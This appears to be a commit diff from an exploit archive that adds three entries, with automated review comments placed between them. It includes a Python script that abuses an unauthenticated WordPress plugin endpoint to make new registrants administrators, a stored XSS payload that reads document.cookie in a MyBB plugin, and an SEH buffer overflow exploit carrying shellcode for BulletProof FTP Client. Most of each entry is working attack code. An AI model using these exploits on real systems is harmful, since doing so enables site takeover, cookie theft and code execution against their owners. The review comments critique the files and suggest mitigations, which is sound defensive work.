Updated 09_07_2014

Offensive Security 2014-09-07 04:43:33 +00:00
parent bdd1b1c20a
commit fe6788f41b
4 changed files with 113 additions and 0 deletions


@ -31104,3 +31104,6 @@ id,file,description,date,author,platform,type,port
34534,platforms/php/webapps/34534.txt,"TCMS Multiple Input Validation Vulnerabilities",2010-08-26,"High-Tech Bridge SA",php,webapps,0
34535,platforms/php/webapps/34535.txt,"Valarsoft WebMatic 3.0.5 Multiple HTML Injection Vulnerabilities",2010-08-26,"High-Tech Bridge SA",php,webapps,0
34536,platforms/php/webapps/34536.txt,"CompuCMS Multiple SQL Injection and Cross Site Scripting Vulnerabilities",2010-08-26,"High-Tech Bridge SA",php,webapps,0
34538,platforms/php/webapps/34538.txt,"Wordpress Plugins Premium Gallery Manager Unauthenticated Configuration Access Vulnerability",2014-09-05,Hannaichi,php,webapps,80
34539,platforms/php/webapps/34539.txt,"MyBB User Social Networks Plugin 1.2 - Stored XSS",2014-09-05,"Fikri Fadzil",php,webapps,80
34540,platforms/windows/dos/34540.py,"BulletProof FTP Client 2010 - Buffer Overflow (SEH) Exploit",2014-09-05,"Robert Kugler",windows,dos,0
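Review bot: The added row for 34540 is filed with type `dos` under `platforms/windows/dos/`, while its own description reads "Buffer Overflow (SEH) Exploit", so the classification and the title disagree. Anyone who triages this index by the `type` column would rank the entry as a crash-only issue. Either the description should say it is a denial-of-service proof of concept, or the row should be filed under the category that matches what the file does, so that the path and type columns stay consistent with the title.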


43
platforms/php/webapps/34538.txt Executable file

@ -0,0 +1,43 @@
#Exploit Title : Wordpress Plugins Premium Gallery Manager Unauthenticated Configuration Access Vulnerability
#Author : Hannaichi [@dntkun]
#Date : February 5th, 2014
#Type : php, html, htm, asp, etc.
#Category : Web Applications
#Vulnerability : Unauthenticated Configuration Access
#Tested On : Windows 7 32-bit | Google Chrome
#Dork : inurl:/wp-content/plugins/premium_gallery_manager/ | USE YOUR BRAIN =))
#Exploit : http://victim/[PATH]/wp-content/plugins/Premium_Gallery_Manager/hades_framework/option_panel/ajax.php
#POC :
Save File As Python (.py) =
import httplib, urllib
#target site
site = "victim" #<--- no http:// or https://
#path to ajax.php
url = "/wp-content/plugins/Premium_Gallery_Manager/hades_framework/option_panel/ajax.php"
def ChangeOption(site, url, option_name, option_value):
params = urllib.urlencode({'action': 'save', 'values[0][name]': option_name, 'values[0][value]': option_value})
headers = {"Content-type": "application/x-www-form-urlencoded", "Accept": "text/plain"}
conn = httplib.HTTPConnection(site)
conn.request("POST", url, params, headers)
response = conn.getresponse()
print response.status, response.reason
data = response.read()
print data
conn.close()
ChangeOption(site, url, "admin_email", "youremail@test.com")
ChangeOption(site, url, "users_can_register", "1")
ChangeOption(site, url, "default_role", "administrator")
print "Now register a new user, they are an administrator by default!"
#Place It Broo No Lazy For This :D !!
--------------------------------------------------------------------------------------------------------------------
Thanks to: #AnonSec Hackers - Borneo Security - Bekantan Crew - Indonesian Hacker - Muslim Hacker - You :*
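Review bot: The header of this advisory names no affected plugin version, no vendor reference and no remediation, so a site owner cannot tell from the file whether an installation is exposed or what to do about it. I would add header lines such as `#Affected Version : <not stated by the author>` and `#Mitigation : block unauthenticated requests to hades_framework/option_panel/ajax.php until the plugin checks login and capability before saving options`. The three calls at the end of the PoC also give defenders something concrete to audit: a site where `users_can_register` is `1`, `default_role` is `administrator`, or `admin_email` has changed unexpectedly should be treated as possibly affected, and a comment should say so. The `#Date` line (February 5th, 2014) differs from the 2014-09-05 date in the index row; presumably one is discovery and the other publication, which the header could state.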

30
platforms/php/webapps/34539.txt Executable file

@ -0,0 +1,30 @@
# Exploit Title: User Social Networks MyBB Plugin 1.2 - Cross Site Scripting
# Google Dork: N/A
# Date: 05.09.2014
# Exploit Author: Fikri Fadzil - fikri.fadzil@impact-alliance.org
# Vendor Homepage - N/A
# Software Link: http://mods.mybb.com/view/user-social-networks
# Version: 1.2
# Tested on: PHP
Description:
This plugin allows you to add social networks, or related, in user
profiles. The information will be shown in a user profile and visible for
anyone who view the profile.
Proof of Concept
1. Login into your account.
2. Go to "Edit Profile" page at "/usercp.php?action=profile"
3. Update your Social Network ID with
"><script>alert(document.cookie)</script><"
4. The result can be seen in multiple places, including your profile page.
* The script will be executed whenever anyone view your profile.
** The result can also be seen in threads you involve IF the administrator
configure this plugin to allow user's social sites information to be
published in every post.
Solution:
Replace the content of "inc/plugins/usersocial.php" with this fix:
http://pastebin.com/T1WgcwDB
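Review bot: The Solution section points at a pastebin paste as the replacement for `inc/plugins/usersocial.php` without describing what the fix changes. A paste is outside the vendor's control and can be edited or removed later, so an administrator following this step would be installing PHP that nobody has reviewed. The advisory should state the fix itself, presumably HTML-encoding the Social Network ID fields before they are rendered in profiles and posts. If the link is kept, it should be accompanied by a checksum line such as `SHA-256 of fixed usersocial.php: <hash not given on this page>`.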

37
platforms/windows/dos/34540.py Executable file

@ -0,0 +1,37 @@
# !/usr/bin/python
#-----------------------------------------------------------------------------#
# Exploit Title: BulletProof FTP Client 2010 - Buffer Overflow (SEH) Exploit #
# Date: Sep 05 2014 #
# Vulnerability Discovery: Gabor Seljan #
# Exploit Author: Robert Kugler #
# Software Link: http://www.bpftp.com/ #
# Version: 2010.75.0.76 #
# Tested on: Windows XP #
# CVE: CVE-2014-2973 #
# #
# Thanks to corelanc0d3r for his awesome tutorials and help! ;-) #
# The "Enter URL" form is also vulnerable #
#-----------------------------------------------------------------------------#
buffer = "This is a BulletProof FTP Client Session-File and should not be modified directly.\n"
buffer+= "\x20" + "\x90" * 89
buffer+= "\xeb\x06\x90\x90"
buffer+= "\xA0\xB3\x3C\x77" # shell32.dll pop pop ret @773CB3A0
buffer+= "\x90" * 119 # 160 characters space
buffer+= ("\x33\xc0\x50\x68"
"\x2E\x65\x78\x65"
"\x68\x63\x61\x6C"
"\x63\x8B\xC4\x6A" # 36 bytes
"\x01\x50\xBB\x35" # ExitProcess is located at 0x77e598fd in kernel32.dll
"\xfd\xe4\x77\xFF"
"\xD3\x33\xc0\x50"
"\xc7\xc0\x8f\x4a"
"\xe5\x77\xff\xe0")
buffer+= "\x90" * (1000 - len(buffer))
# Just load the "BP Session" and click on "Connect".
file = open("ftpsession.bps","w")
file.write(buffer)
file.close()
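Review bot: The comment beside the payload bytes names ExitProcess at 0x77e598fd, but that value does not appear anywhere in the byte string, so the only comment documenting the payload cannot be relied on. The listing also never says what the payload does; the bytes after the two `\x68` opcodes spell ".exe" and "calc", and a comment such as `# payload: starts calc.exe as a harmless demonstration; addresses are fixed to the tested Windows XP build` would let a reader assess the file without disassembling it. On style, `buffer` and `file` shadow Python 2 builtins, and the first line `# !/usr/bin/python` is an ordinary comment rather than an interpreter line.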